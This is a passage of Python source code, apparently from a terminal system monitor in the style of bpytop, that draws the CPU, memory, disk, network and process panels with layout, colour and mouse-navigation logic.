f'{THEME.main_fg}{Mv.to(by + cy, bx + cx)}{Fx.b}{"CPU "}{Fx.ub}{Meters.cpu(cpu.cpu_usage[0][-1])}'
f'{THEME.gradient["cpu"][cpu.cpu_usage[0][-1]]}{cpu.cpu_usage[0][-1]:>4}{THEME.main_fg}%')
if cpu.got_sensors:
out += (f'{THEME.inactive_fg} ⡀⡀⡀⡀⡀{Mv.l(5)}{THEME.gradient["temp"][min_max(cpu.cpu_temp[0][-1], 0, cpu.cpu_temp_crit) * 100 // cpu.cpu_temp_crit]}{Graphs.temps[0](None if cls.resized else cpu.cpu_temp[0][-1])}'
f'{cpu.cpu_temp[0][-1]:>4}{THEME.main_fg}°C')
cy += 1
for n in range(1, THREADS + 1):
out += f'{THEME.main_fg}{Mv.to(by + cy, bx + cx)}{Fx.b + "C" + Fx.ub if THREADS < 100 else ""}{str(n):<{2 if cls.column_size == 0 else 3}}'
if cls.column_size > 0:
out += f'{THEME.inactive_fg}{"⡀" * (5 * cls.column_size)}{Mv.l(5 * cls.column_size)}{THEME.gradient["cpu"][cpu.cpu_usage[n][-1]]}{Graphs.cores[n-1](None if cls.resized else cpu.cpu_usage[n][-1])}'
else:
out += f'{THEME.gradient["cpu"][cpu.cpu_usage[n][-1]]}'
out += f'{cpu.cpu_usage[n][-1]:>{3 if cls.column_size < 2 else 4}}{THEME.main_fg}%'
if cpu.got_sensors:
if cls.column_size > 1:
out += f'{THEME.inactive_fg} ⡀⡀⡀⡀⡀{Mv.l(5)}{THEME.gradient["temp"][100 if cpu.cpu_temp[n][-1] >= cpu.cpu_temp_crit else (cpu.cpu_temp[n][-1] * 100 // cpu.cpu_temp_crit)]}{Graphs.temps[n](None if cls.resized else cpu.cpu_temp[n][-1])}'
else:
out += f'{THEME.gradient["temp"][100 if cpu.cpu_temp[n][-1] >= cpu.cpu_temp_crit else (cpu.cpu_temp[n][-1] * 100 // cpu.cpu_temp_crit)]}'
out += f'{cpu.cpu_temp[n][-1]:>4}{THEME.main_fg}°C'
out += f'{THEME.div_line(Symbol.v_line)}'
cy += 1
if cy == bh:
cc += 1; cy = 1; cx = ccw * cc
if cc == cls.box_columns: break
if cy < bh - 1: cy = bh - 1
if cy < bh and cc < cls.box_columns:
if cls.column_size == 2 and cpu.got_sensors:
lavg = f' Load AVG: {" ".join(str(l) for l in cpu.load_avg):^19.19}'
elif cls.column_size == 2 or (cls.column_size == 1 and cpu.got_sensors):
lavg = f'LAV: {" ".join(str(l) for l in cpu.load_avg):^14.14}'
elif cls.column_size == 1 or (cls.column_size == 0 and cpu.got_sensors):
lavg = f'L {" ".join(str(round(l, 1)) for l in cpu.load_avg):^11.11}'
else:
lavg = f'{" ".join(str(round(l, 1)) for l in cpu.load_avg[:2]):^7.7}'
out += f'{Mv.to(by + cy, bx + cx)}{THEME.main_fg}{lavg}{THEME.div_line(Symbol.v_line)}'
out += f'{Mv.to(y + h - 1, x + 1)}{THEME.graph_text}up {cpu.uptime}'
Draw.buffer(cls.buffer, f'{out_misc}{out}{Term.fg}', only_save=Menu.active)
cls.resized = cls.redraw = cls.clock_block = False
class MemBox(Box):
name = "mem"
height_p = 38
width_p = 45
x = 1
y = 1
mem_meter: int = 0
mem_size: int = 0
disk_meter: int = 0
divider: int = 0
mem_width: int = 0
disks_width: int = 0
graph_height: int
resized: bool = True
redraw: bool = False
buffer: str = "mem"
swap_on: bool = CONFIG.show_swap
Box.buffers.append(buffer)
mem_names: List[str] = ["used", "available", "cached", "free"]
swap_names: List[str] = ["used", "free"]
@classmethod
def _calc_size(cls):
width_p: int; height_p: int
if cls.stat_mode:
width_p, height_p = 100, cls.height_p
else:
width_p, height_p = cls.width_p, cls.height_p
cls.width = round(Term.width * width_p / 100)
cls.height = round(Term.height * height_p / 100) + 1
Box._b_mem_h = cls.height
cls.y = Box._b_cpu_h + 1
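#* Split the box width between the memory and disks panels when disks are shown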
if CONFIG.show_disks:
cls.mem_width = ceil((cls.width - 3) / 2)
cls.disks_width = cls.width - cls.mem_width - 3
if cls.mem_width + cls.disks_width < cls.width - 2: cls.mem_width += 1
cls.divider = cls.x + cls.mem_width
else:
cls.mem_width = cls.width - 1
item_height: int = 6 if cls.swap_on and not CONFIG.swap_disk else 4
if cls.height - (3 if cls.swap_on and not CONFIG.swap_disk else 2) > 2 * item_height: cls.mem_size = 3
elif cls.mem_width > 25: cls.mem_size = 2
else: cls.mem_size = 1
cls.mem_meter = cls.width - (cls.disks_width if CONFIG.show_disks else 0) - (9 if cls.mem_size > 2 else 20)
if cls.mem_size == 1: cls.mem_meter += 6
if cls.mem_meter < 1: cls.mem_meter = 0
if CONFIG.mem_graphs:
cls.graph_height = round(((cls.height - (2 if cls.swap_on and not CONFIG.swap_disk else 1)) - (2 if cls.mem_size == 3 else 1) * item_height) / item_height)
if cls.graph_height == 0: cls.graph_height = 1
if cls.graph_height > 1: cls.mem_meter += 6
else:
cls.graph_height = 0
if CONFIG.show_disks:
cls.disk_meter = cls.width - cls.mem_width - 23
if cls.disks_width < 25:
cls.disk_meter += 10
if cls.disk_meter < 1: cls.disk_meter = 0
@classmethod
def _draw_bg(cls) -> str:
if cls.proc_mode: return ""
out: str = ""
out += f'{create_box(box=cls, line_color=THEME.mem_box)}'
if CONFIG.show_disks:
out += (f'{Mv.to(cls.y, cls.divider + 2)}{THEME.mem_box(Symbol.title_left)}{Fx.b}{THEME.title("disks")}{Fx.ub}{THEME.mem_box(Symbol.title_right)}'
f'{Mv.to(cls.y, cls.divider)}{THEME.mem_box(Symbol.div_up)}'
f'{Mv.to(cls.y + cls.height - 1, cls.divider)}{THEME.mem_box(Symbol.div_down)}{THEME.div_line}'
f'{"".join(f"{Mv.to(cls.y + i, cls.divider)}{Symbol.v_line}" for i in range(1, cls.height - 1))}')
return out
@classmethod
def _draw_fg(cls):
if cls.proc_mode: return
mem = MemCollector
if mem.redraw: cls.redraw = True
out: str = ""
out_misc: str = ""
gbg: str = ""
gmv: str = ""
gli: str = ""
x, y, w, h = cls.x + 1, cls.y + 1, cls.width - 2, cls.height - 2
if cls.resized or cls.redraw:
cls._calc_size()
out_misc += cls._draw_bg()
Meters.mem = {}
Meters.swap = {}
Meters.disks_used = {}
Meters.disks_free = {}
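#* Rebuild memory and swap meters (or graphs when mem_graphs is enabled) and the disk meters on resize/redraw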
if cls.mem_meter > 0:
for name in cls.mem_names:
if CONFIG.mem_graphs:
Meters.mem[name] = Graph(cls.mem_meter, cls.graph_height, THEME.gradient[name], mem.vlist[name])
else:
Meters.mem[name] = Meter(mem.percent[name], cls.mem_meter, name)
if cls.swap_on:
for name in cls.swap_names:
if CONFIG.mem_graphs and not CONFIG.swap_disk:
Meters.swap[name] = Graph(cls.mem_meter, cls.graph_height, THEME.gradient[name], mem.swap_vlist[name])
elif CONFIG.swap_disk and CONFIG.show_disks:
Meters.disks_used["__swap"] = Meter(mem.swap_percent["used"], cls.disk_meter, "used")
if len(mem.disks) * 3 <= h + 1:
Meters.disks_free["__swap"] = Meter(mem.swap_percent["free"], cls.disk_meter, "free")
break
else:
Meters.swap[name] = Meter(mem.swap_percent[name], cls.mem_meter, name)
if cls.disk_meter > 0:
for n, name in enumerate(mem.disks.keys()):
if n * 2 > h: break
Meters.disks_used[name] = Meter(mem.disks[name]["used_percent"], cls.disk_meter, "used")
if len(mem.disks) * 3 <= h + 1:
Meters.disks_free[name] = Meter(mem.disks[name]["free_percent"], cls.disk_meter, "free")
if not "g" in Key.mouse:
Key.mouse["g"] = [[x + cls.mem_width - 8 + i, y-1] for i in range(5)]
out_misc += (f'{Mv.to(y-1, x + cls.mem_width - 9)}{THEME.mem_box(Symbol.title_left)}{Fx.b if CONFIG.mem_graphs else ""}'
f'{THEME.hi_fg("g")}{THEME.title("raph")}{Fx.ub}{THEME.mem_box(Symbol.title_right)}')
if CONFIG.show_disks:
if not "s" in Key.mouse:
Key.mouse["s"] = [[x + w - 6 + i, y-1] for i in range(4)]
out_misc += (f'{Mv.to(y-1, x + w - 7)}{THEME.mem_box(Symbol.title_left)}{Fx.b if CONFIG.swap_disk else ""}'
f'{THEME.hi_fg("s")}{THEME.title("wap")}{Fx.ub}{THEME.mem_box(Symbol.title_right)}')
Draw.buffer("mem_misc", out_misc, only_save=True)
#* Mem
cx = 1; cy = 1
out += f'{Mv.to(y, x+1)}{THEME.title}{Fx.b}Total:{mem.string["total"]:>{cls.mem_width - 9}}{Fx.ub}{THEME.main_fg}'
if cls.graph_height > 0:
gli = f'{Mv.l(2)}{THEME.mem_box(Symbol.title_right)}{THEME.div_line}{Symbol.h_line * (cls.mem_width - 1)}{"" if CONFIG.show_disks else THEME.mem_box}{Symbol.title_left}{Mv.l(cls.mem_width - 1)}{THEME.title}'
if cls.graph_height >= 2:
gbg = f'{Mv.l(1)}'
gmv = f'{Mv.l(cls.mem_width - 2)}{Mv.u(cls.graph_height - 1)}'
big_mem: bool = True if cls.mem_width > 21 else False
for name in cls.mem_names:
if cls.mem_size > 2:
out += (f'{Mv.to(y+cy, x+cx)}{gli}{name.capitalize()[:None if big_mem else 5]+":":<{1 if big_mem else 6.6}}{Mv.to(y+cy, x+cx + cls.mem_width - 3 - (len(mem.string[name])))}{Fx.trans(mem.string[name])}'
f'{Mv.to(y+cy+1, x+cx)}{gbg}{Meters.mem[name](None if cls.resized else mem.percent[name])}{gmv}{str(mem.percent[name])+"%":>4}')
cy += 2 if not cls.graph_height else cls.graph_height + 1
else:
out += f'{Mv.to(y+cy, x+cx)}{name.capitalize():{5.5 if cls.mem_size > 1 else 1.1}} {gbg}{Meters.mem[name](None if cls.resized else mem.percent[name])}{mem.string[name][:None if cls.mem_size > 1 else -2]:>{9 if cls.mem_size > 1 else 7}}'
cy += 1 if not cls.graph_height else cls.graph_height
#* Swap
if cls.swap_on and CONFIG.show_swap and not CONFIG.swap_disk:
if h - cy > 5:
if cls.graph_height > 0: out += f'{Mv.to(y+cy, x+cx)}{gli}'
cy += 1
out += f'{Mv.to(y+cy, x+cx)}{THEME.title}{Fx.b}Swap:{mem.swap_string["total"]:>{cls.mem_width - 8}}{Fx.ub}{THEME.main_fg}'
cy += 1
for name in cls.swap_names:
if cls.mem_size > 2:
out += (f'{Mv.to(y+cy, x+cx)}{gli}{name.capitalize()[:None if big_mem else 5]+":":<{1 if big_mem else 6.6}}{Mv.to(y+cy, x+cx + cls.mem_width - 3 - (len(mem.swap_string[name])))}{Fx.trans(mem.swap_string[name])}'
f'{Mv.to(y+cy+1, x+cx)}{gbg}{Meters.swap[name](None if cls.resized else mem.swap_percent[name])}{gmv}{str(mem.swap_percent[name])+"%":>4}')
cy += 2 if not cls.graph_height else cls.graph_height + 1
else:
out += f'{Mv.to(y+cy, x+cx)}{name.capitalize():{5.5 if cls.mem_size > 1 else 1.1}} {gbg}{Meters.swap[name](None if cls.resized else mem.swap_percent[name])}{mem.swap_string[name][:None if cls.mem_size > 1 else -2]:>{9 if cls.mem_size > 1 else 7}}'; cy += 1 if not cls.graph_height else cls.graph_height
if cls.graph_height > 0 and not cy == h: out += f'{Mv.to(y+cy, x+cx)}{gli}'
#* Disks
if CONFIG.show_disks:
cx = x + cls.mem_width - 1; cy = 0
big_disk: bool = True if cls.disks_width >= 25 else False
gli = f'{Mv.l(2)}{THEME.div_line}{Symbol.title_right}{Symbol.h_line * cls.disks_width}{THEME.mem_box}{Symbol.title_left}{Mv.l(cls.disks_width - 1)}'
for name, item in mem.disks.items():
if cy > h - 2: break
out += Fx.trans(f'{Mv.to(y+cy, x+cx)}{gli}{THEME.title}{Fx.b}{item["name"]:{cls.disks_width - 2}.12}{Mv.to(y+cy, x + cx + cls.disks_width - 11)}{item["total"][:None if big_disk else -2]:>9}')
out += f'{Mv.to(y+cy, x + cx + (cls.disks_width // 2) - (len(item["io"]) // 2) - 2)}{Fx.ub}{THEME.main_fg}{item["io"]}{Fx.ub}{THEME.main_fg}{Mv.to(y+cy+1, x+cx)}'
out += f'Used:{str(item["used_percent"]) + "%":>4} ' if big_disk else "U "
out += f'{Meters.disks_used[name]}{item["used"][:None if big_disk else -2]:>{9 if big_disk else 7}}'
cy += 2
if len(mem.disks) * 3 <= h + 1:
if cy > h - 1: break
out += Mv.to(y+cy, x+cx)
out += f'Free:{str(item["free_percent"]) + "%":>4} ' if big_disk else f'{"F "}'
out += f'{Meters.disks_free[name]}{item["free"][:None if big_disk else -2]:>{9 if big_disk else 7}}'
cy += 1
if len(mem.disks) * 4 <= h + 1: cy += 1
Draw.buffer(cls.buffer, f'{out_misc}{out}{Term.fg}', only_save=Menu.active)
cls.resized = cls.redraw = False
class NetBox(Box, SubBox):
name = "net"
height_p = 30
width_p = 45
x = 1
y = 1
resized: bool = True
redraw: bool = True
graph_height: Dict[str, int] = {}
symbols: Dict[str, str] = {"download" : "▼", "upload" : "▲"}
buffer: str = "net"
Box.buffers.append(buffer)
@classmethod
def _calc_size(cls):
width_p: int
if cls.stat_mode:
width_p = 100
else:
width_p = cls.width_p
cls.width = round(Term.width * width_p / 100)
cls.height = Term.height - Box._b_cpu_h - Box._b_mem_h
cls.y = Term.height - cls.height + 1
cls.box_width = 27 if cls.width > 45 else 19
cls.box_height = 9 if cls.height > 10 else cls.height - 2
cls.box_x = cls.width - cls.box_width - 1
cls.box_y = cls.y + ((cls.height - 2) // 2) - cls.box_height // 2 + 1
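#* The download graph takes the upper half of the box, the upload graph the remainder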
cls.graph_height["download"] = round((cls.height - 2) / 2)
cls.graph_height["upload"] = cls.height - 2 - cls.graph_height["download"]
cls.redraw = True
@classmethod
def _draw_bg(cls) -> str:
if cls.proc_mode: return ""
return f'{create_box(box=cls, line_color=THEME.net_box)}\
{create_box(x=cls.box_x, y=cls.box_y, width=cls.box_width, height=cls.box_height, line_color=THEME.div_line, fill=False, title="Download", title2="Upload")}'
@classmethod
def _draw_fg(cls):
if cls.proc_mode: return
net = NetCollector
if net.redraw: cls.redraw = True
if not net.nic: return
out: str = ""
out_misc: str = ""
x, y, w, h = cls.x + 1, cls.y + 1, cls.width - 2, cls.height - 2
bx, by, bw, bh = cls.box_x + 1, cls.box_y + 1, cls.box_width - 2, cls.box_height - 2
reset: bool = bool(net.stats[net.nic]["download"]["offset"])
if cls.resized or cls.redraw:
out_misc += cls._draw_bg()
if not "b" in Key.mouse:
Key.mouse["b"] = [[x+w - len(net.nic[:10]) - 9 + i, y-1] for i in range(4)]
Key.mouse["n"] = [[x+w - 5 + i, y-1] for i in range(4)]
Key.mouse["z"] = [[x+w - len(net.nic[:10]) - 14 + i, y-1] for i in range(4)]
out_misc += (f'{Mv.to(y-1, x+w - 25)}{THEME.net_box}{Symbol.h_line * (10 - len(net.nic[:10]))}{Symbol.title_left}{Fx.b if reset else ""}{THEME.hi_fg("z")}{THEME.title("ero")}'
f'{Fx.ub}{THEME.net_box(Symbol.title_right)}{Term.fg}'
f'{THEME.net_box}{Symbol.title_left}{Fx.b}{THEME.hi_fg("<b")} {THEME.title(net.nic[:10])} {THEME.hi_fg("n>")}{Fx.ub}{THEME.net_box(Symbol.title_right)}{Term.fg}')
if w - len(net.nic[:10]) - 20 > 6:
if not "a" in Key.mouse: Key.mouse["a"] = [[x+w - 20 - len(net.nic[:10]) + i, y-1] for i in range(4)]
out_misc += (f'{Mv.to(y-1, x+w - 21 - len(net.nic[:10]))}{THEME.net_box(Symbol.title_left)}{Fx.b if net.auto_min else ""}{THEME.hi_fg("a")}{THEME.title("uto")}'
f'{Fx.ub}{THEME.net_box(Symbol.title_right)}{Term.fg}')
if w - len(net.nic[:10]) - 20 > 13:
if not "y" in Key.mouse: Key.mouse["y"] = [[x+w - 26 - len(net.nic[:10]) + i, y-1] for i in range(4)]
out_misc += (f'{Mv.to(y-1, x+w - 27 - len(net.nic[:10]))}{THEME.net_box(Symbol.title_left)}{Fx.b if CONFIG.net_sync else ""}{THEME.title("s")}{THEME.hi_fg("y")}{THEME.title("nc")}'
f'{Fx.ub}{THEME.net_box(Symbol.title_right)}{Term.fg}')
Draw.buffer("net_misc", out_misc, only_save=True)
cy = 0
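#* Draw graph and stat lines for each transfer direction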
for direction in ["download", "upload"]:
strings = net.strings[net.nic][direction]
stats = net.stats[net.nic][direction]
if cls.redraw: stats["redraw"] = True
if stats["redraw"] or cls.resized:
Graphs.net[direction] = Graph(w - bw - 3, cls.graph_height[direction], THEME.gradient[direction], stats["speed"], max_value=net.sync_top if CONFIG.net_sync else stats["graph_top"],
invert=False if direction == "download" else True, color_max_value=net.net_min.get(direction) if CONFIG.net_color_fixed else None)
out += f'{Mv.to(y if direction == "download" else y + cls.graph_height["download"], x)}{Graphs.net[direction](None if stats["redraw"] else stats["speed"][-1])}'
out += (f'{Mv.to(by+cy, bx)}{THEME.main_fg}{cls.symbols[direction]} {strings["byte_ps"]:<10.10}' +
("" if bw < 20 else f'{Mv.to(by+cy, bx+bw - 12)}{"(" + strings["bit_ps"] + ")":>12.12}'))
cy += 1 if bh != 3 else 2
if bh >= 6:
out += f'{Mv.to(by+cy, bx)}{cls.symbols[direction]} {"Top:"}{Mv.to(by+cy, bx+bw - 12)}{"(" + strings["top"] + ")":>12.12}'
cy += 1
if bh >= 4:
out += f'{Mv.to(by+cy, bx)}{cls.symbols[direction]} {"Total:"}{Mv.to(by+cy, bx+bw - 10)}{strings["total"]:>10.10}'
if bh > 2 and bh % 2: cy += 2
else: cy += 1
stats["redraw"] = False
out += (f'{Mv.to(y, x)}{THEME.graph_text(net.sync_string if CONFIG.net_sync else net.strings[net.nic]["download"]["graph_top"])}'
f'{Mv.to(y+h-1, x)}{THEME.graph_text(net.sync_string if CONFIG.net_sync else net.strings[net.nic]["upload"]["graph_top"])}')
Draw.buffer(cls.buffer, f'{out_misc}{out}{Term.fg}', only_save=Menu.active)
cls.redraw = cls.resized = False
class ProcBox(Box):
name = "proc"
height_p = 68
width_p = 55
x = 1
y = 1
current_y: int = 0
current_h: int = 0
select_max: int = 0
selected: int = 0
selected_pid: int = 0
last_selection: int = 0
filtering: bool = False
moved: bool = False
start: int = 1
count: int = 0
s_len: int = 0
detailed: bool = False
detailed_x: int = 0
detailed_y: int = 0
detailed_width: int = 0
detailed_height: int = 8
resized: bool = True
redraw: bool = True
buffer: str = "proc"
pid_counter: Dict[int, int] = {}
Box.buffers.append(buffer)
@classmethod
def _calc_size(cls):
width_p: int; height_p: int
if cls.proc_mode:
width_p, height_p = 100, 80
else:
width_p, height_p = cls.width_p, cls.height_p
cls.width = round(Term.width * width_p / 100)
cls.height = round(Term.height * height_p / 100)
if cls.height + Box._b_cpu_h > Term.height: cls.height = Term.height - Box._b_cpu_h
cls.x = Term.width - cls.width + 1
cls.y = Box._b_cpu_h + 1
cls.current_y = cls.y
cls.current_h = cls.height
cls.select_max = cls.height - 3
cls.redraw = True
cls.resized = True
@classmethod
def _draw_bg(cls) -> str:
if cls.stat_mode: return ""
return create_box(box=cls, line_color=THEME.proc_box)
@classmethod
def selector(cls, key: str, mouse_pos: Tuple[int, int] = (0, 0)):
old: Tuple[int, int] = (cls.start, cls.selected)
new_sel: int
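#* Translate navigation keys and mouse events into new scroll offset (start) and selection values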
if key == "up":
if cls.selected == 1 and cls.start > 1:
cls.start -= 1
elif cls.selected == 1:
cls.selected = 0
elif cls.selected > 1:
cls.selected -= 1
elif key == "down":
if cls.selected == 0 and ProcCollector.detailed and cls.last_selection:
cls.selected = cls.last_selection
cls.last_selection = 0
if cls.selected == cls.select_max and cls.start < ProcCollector.num_procs - cls.select_max + 1:
cls.start += 1
elif cls.selected < cls.select_max:
cls.selected += 1
elif key == "mouse_scroll_up" and cls.start > 1:
cls.start -= 5
elif key == "mouse_scroll_down" and cls.start < ProcCollector.num_procs - cls.select_max + 1:
cls.start += 5
elif key == "page_up" and cls.start > 1:
cls.start -= cls.select_max
elif key == "page_down" and cls.start < ProcCollector.num_procs - cls.select_max + 1:
cls.start += cls.select_max
elif key == "home":
if cls.start > 1: cls.start = 1
elif cls.selected > 0: cls.selected = 0
elif key == "end":
if cls.start < ProcCollector.num_procs - cls.select_max + 1: cls.start = ProcCollector.num_procs - cls.select_max + 1
elif cls.selected < cls.select_max: cls.selected = cls.select_max
elif key == "mouse_click":
if mouse_pos[0] > cls.x + cls.width - 4 and mouse_pos[1] > cls.current_y + 1 and mouse_pos[1] < cls.current_y + 1 + cls.select_max + 1:
if mouse_pos[1] == cls.current_y + 2:
cls.start = 1
elif mouse_pos[1] == cls.current_y + 1 + cls.select_max:
cls.start = ProcCollector.num_procs - cls.select_max + 1
else:
cls.start = round((mouse_pos[1] - cls.current_y) * ((ProcCollector.num_procs - cls.select_max - 2) / (cls.select_max - 2)))
else:
new_sel = mouse_pos[1] - cls.current_y - 1 if mouse_pos[1] >= cls.current_y - 1 else 0
if new_sel > 0 and new_sel == cls.selected:
Key.list.insert(0, "enter")
return
elif new_sel > 0 and new_sel != cls.selected:
if cls.last_selection: cls.last_selection = 0
cls.selected = new_sel
elif key == "mouse_unselect":
cls.selected = 0
if cls.start > ProcCollector.num_procs - cls.select_max + 1 and ProcCollector.num_procs > cls.select_max: cls.start = ProcCollector.num_procs - cls.select_max + 1
elif cls.start > ProcCollector.num_procs: cls.start = ProcCollector.num_procs
if cls.start < 1: cls.start = 1
if cls.selected > ProcCollector.num_procs and ProcCollector.num_procs < cls.select_max: cls.selected = ProcCollector.num_procs
elif cls.selected > cls.select_max: cls.selected = cls.select_max
if cls.selected < 0: cls.selected = 0
if old != (cls.start, cls.selected):
cls.moved = True
Collector.collect(ProcCollector, proc_interrupt=True, redraw=True, only_draw=True)
@classmethod
def _draw_fg(cls):
if cls.stat_mode: return
proc = ProcCollector
if proc.proc_interrupt: return
if proc.redraw: cls.redraw = True
out: str = ""
out_misc: str = ""
n: int = 0
x, y, w, h = cls.x + 1, cls.current_y + 1, cls.width - 2, cls.current_h - 2
prog_len: int; arg_len: int; val: int; c_color: str; m_color: str; t_color: str; sort_pos: int; tree_len: int; is_selected: bool; calc: int
dgx: int; dgw: int; dx: int; dw: int; dy: int
l_count: int = 0
scroll_pos: int = 0
killed: bool = True
indent: str = ""
offset: int = 0
tr_show: bool = True
usr_show: bool = True
vals: List[str]
g_color: str = ""
s_len: int = 0
if proc.search_filter: s_len = len(proc.search_filter[:10])
loc_string: str = f'{cls.start + cls.selected - 1}/{proc.num_procs}'
end: str = ""
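#* Set up detailed-view geometry and calculate program/argument column widths from the available box width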
if proc.detailed:
dgx, dgw = x, w // 3
dw = w - dgw - 1
if dw > 120:
dw = 120
dgw = w - 121
dx = x + dgw + 2
dy = cls.y + 1
if w > 67:
arg_len = w - 53 - (1 if proc.num_procs > cls.select_max else 0)
prog_len = 15
else:
arg_len = 0
prog_len = w - 38 - (1 if proc.num_procs > cls.select_max else 0)
if prog_len < 15:
tr_show = False
prog_len += 5
if prog_len < 12:
usr_show = False
prog_len += 9
if CONFIG.proc_tree:
tree_len = arg_len + prog_len + 6
arg_len = 0
#* Buttons and titles only redrawn if needed
if cls.resized or cls.redraw:
s_len += len(CONFIG.proc_sorting)
if cls.resized or s_len != cls.s_len or proc.detailed:
cls.s_len = s_len
for k in ["e", "r", "c", "t", "k", "i", "enter", "left", " ", "f", "delete"]:
if k in Key.mouse: del Key.mouse[k]
if proc.detailed:
killed = proc.details["killed"]
main = THEME.main_fg if cls.selected == 0 and not killed else THEME.inactive_fg
hi = THEME.hi_fg if cls.selected == 0 and not killed else THEME.inactive_fg
title = THEME.title if cls.selected == 0 and not killed else THEME.inactive_fg
if cls.current_y != cls.y + 8 or cls.resized or Graphs.detailed_cpu is NotImplemented:
cls.current_y = cls.y + 8
cls.current_h = cls.height - 8
for i in range(7): out_misc += f'{Mv.to(dy+i, x)}{" " * w}'
out_misc += (f'{Mv.to(dy+7, x-1)}{THEME.proc_box}{Symbol.title_right}{Symbol.h_line*w}{Symbol.title_left}'
f'{Mv.to(dy+7, x+1)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{THEME.title(cls.name)}{Fx.ub}{THEME.proc_box(Symbol.title_right)}{THEME.div_line}')
for i in range(7):
out_misc += f'{Mv.to(dy + i, dgx + dgw + 1)}{Symbol.v_line}'
out_misc += (f'{Mv.to(dy-1, x-1)}{THEME.proc_box}{Symbol.left_up}{Symbol.h_line*w}{Symbol.right_up}'
f'{Mv.to(dy-1, dgx + dgw + 1)}{Symbol.div_up}'
f'{Mv.to(dy-1, x+1)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{THEME.title(str(proc.details["pid"]))}{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{THEME.title(proc.details["name"][:(dgw - 11)])}{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
if cls.selected == 0:
Key.mouse["enter"] = [[dx+dw-10 + i, dy-1] for i in range(7)]
if cls.selected == 0 and not killed:
Key.mouse["t"] = [[dx+2 + i, dy-1] for i in range(9)]
out_misc += (f'{Mv.to(dy-1, dx+dw - 11)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{title if cls.selected > 0 else THEME.title}close{Fx.ub} {main if cls.selected > 0 else THEME.main_fg}{Symbol.enter}{THEME.proc_box(Symbol.title_right)}'
f'{Mv.to(dy-1, dx+1)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}t{title}erminate{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
if dw > 28:
if cls.selected == 0 and not killed and not "k" in Key.mouse: Key.mouse["k"] = [[dx + 13 + i, dy-1] for i in range(4)]
out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}k{title}ill{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
if dw > 39:
if cls.selected == 0 and not killed and not "i" in Key.mouse: Key.mouse["i"] = [[dx + 19 + i, dy-1] for i in range(9)]
out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}i{title}nterrupt{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
if Graphs.detailed_cpu is NotImplemented or cls.resized:
Graphs.detailed_cpu = Graph(dgw+1, 7, THEME.gradient["cpu"], proc.details_cpu)
Graphs.detailed_mem = Graph(dw // 3, 1, None, proc.details_mem)
cls.select_max = cls.height - 11
y = cls.y + 9
h = cls.height - 10
else:
if cls.current_y != cls.y or cls.resized:
cls.current_y = cls.y
cls.current_h = cls.height
y, h = cls.y + 1, cls.height - 2
out_misc += (f'{Mv.to(y-1, x-1)}{THEME.proc_box}{Symbol.left_up}{Symbol.h_line*w}{Symbol.right_up}'
f'{Mv.to(y-1, x+1)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{THEME.title(cls.name)}{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
f'{Mv.to(y+7, x-1)}{THEME.proc_box(Symbol.v_line)}{Mv.r(w)}{THEME.proc_box(Symbol.v_line)}')
cls.select_max = cls.height - 3
sort_pos = x + w - len(CONFIG.proc_sorting) - 7
if not "left" in Key.mouse:
Key.mouse["left"] = [[sort_pos + i, y-1] for i in range(3)]
Key.mouse["right"] = [[sort_pos + len(CONFIG.proc_sorting) + 3 + i, y-1] for i in range(3)]
out_misc += (f'{Mv.to(y-1, x + 8)}{THEME.proc_box(Symbol.h_line * (w - 9))}' +
("" if not proc.detailed else f"{Mv.to(dy+7, dgx + dgw + 1)}{THEME.proc_box(Symbol.div_down)}") +
f'{Mv.to(y-1, sort_pos)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{THEME.hi_fg("<")} {THEME.title(CONFIG.proc_sorting)} '
f'{THEME.hi_fg(">")}{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
if w > 29 + s_len:
if not "e" in Key.mouse: Key.mouse["e"] = [[sort_pos - 5 + i, y-1] for i in range(4)]
out_misc += (f'{Mv.to(y-1, sort_pos - 6)}{THEME.proc_box(Symbol.title_left)}{Fx.b if CONFIG.proc_tree else ""}'
f'{THEME.title("tre")}{THEME.hi_fg("e")}{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
if w > 37 + s_len:
if not "r" in Key.mouse: Key.mouse["r"] = [[sort_pos - 14 + i, y-1] for i in range(7)]
out_misc += (f'{Mv.to(y-1, sort_pos - 15)}{THEME.proc_box(Symbol.title_left)}{Fx.b if CONFIG.proc_reversed else ""}'
f'{THEME.hi_fg("r")}{THEME.title("everse")}{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
if w > 47 + s_len:
if not "c" in Key.mouse: Key.mouse["c"] = [[sort_pos - 24 + i, y-1] for i in range(8)]
out_misc += (f'{Mv.to(y-1, sort_pos - 25)}{THEME.proc_box(Symbol.title_left)}{Fx.b if CONFIG.proc_per_core else ""}'
f'{THEME.title("per-")}{THEME.hi_fg("c")}{THEME.title("ore")}{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
if not "f" in Key.mouse or cls.resized: Key.mouse["f"] = [[x+5 + i, y-1] for i in range(6 if not proc.search_filter else 2 + len(proc.search_filter[-10:]))]
if proc.search_filter:
if not "delete" in Key.mouse: Key.mouse["delete"] = [[x+11 + len(proc.search_filter[-10:]) + i, y-1] for i in range(3)]
elif "delete" in Key.mouse:
del Key.mouse["delete"]
out_misc += (f'{Mv.to(y-1, x + 7)}{THEME.proc_box(Symbol.title_left)}{Fx.b if cls.filtering or proc.search_filter else ""}{THEME.hi_fg("f")}{THEME.title}' +
("ilter" if not proc.search_filter and not cls.filtering else f' {proc.search_filter[-(10 if w < 83 else w - 74):]}{(Fx.bl + "█" + Fx.ubl) if cls.filtering else THEME.hi_fg(" del")}') +
f'{THEME.proc_box(Symbol.title_right)}')
main = THEME.inactive_fg if cls.selected == 0 else THEME.main_fg
hi = THEME.inactive_fg if cls.selected == 0 else THEME.hi_fg
title = THEME.inactive_fg if cls.selected == 0 else THEME.title
